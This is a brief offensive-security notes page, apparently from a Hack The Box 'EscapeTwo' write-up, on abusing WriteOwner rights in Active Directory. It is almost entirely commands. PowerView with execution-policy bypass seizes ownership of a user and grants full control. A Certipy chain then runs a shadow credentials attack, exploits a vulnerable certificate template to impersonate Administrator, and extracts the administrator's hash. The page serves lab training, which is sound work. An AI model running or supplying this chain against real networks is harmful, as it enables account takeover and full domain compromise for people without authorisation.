search
LinkedInGithub
githubEdit

write-owner

CTF Walkthrough: HTB - EscapeTwo | HTB Writeupsarrow-up-right 

powershell -ep bypass; Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'targetUser' -OwnerIdentity 'YouOwnthe-Username'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "targetUser" -PrincipalIdentity "YouOwntheUser"

Verify

 Get-DomainUser | Where-Object { $_.Name -like "*YouOwntheUser*" } | Select-Object Name, Objectsid
Get-DomainObjectAcl -Identity 'targetUser' | Where-Object { $_.ActiveDirectoryRights -eq 'GenericAll' }

We can perform Shadow Credentials attack, Reset Password or targeted Kerberoasting attack.

hashtag
Shadow Credential attack

Get NT hash of ca_svc 

certipy shadow auto -u username@domain -p pass -account ca_svc -dc-ip 10.10.10.51

Find the vulnerable template 

certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable

Exploit a vulnerable template 

certipy req -u ca_svc@domain -hashes :hash -ca CertificateAuthorityName -template VulnerableTemplate -upn Administrator@sequel.htb

Get administrator hash 

certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb
Previoussysvol-pillagingNext05-lateral-movement

Last updated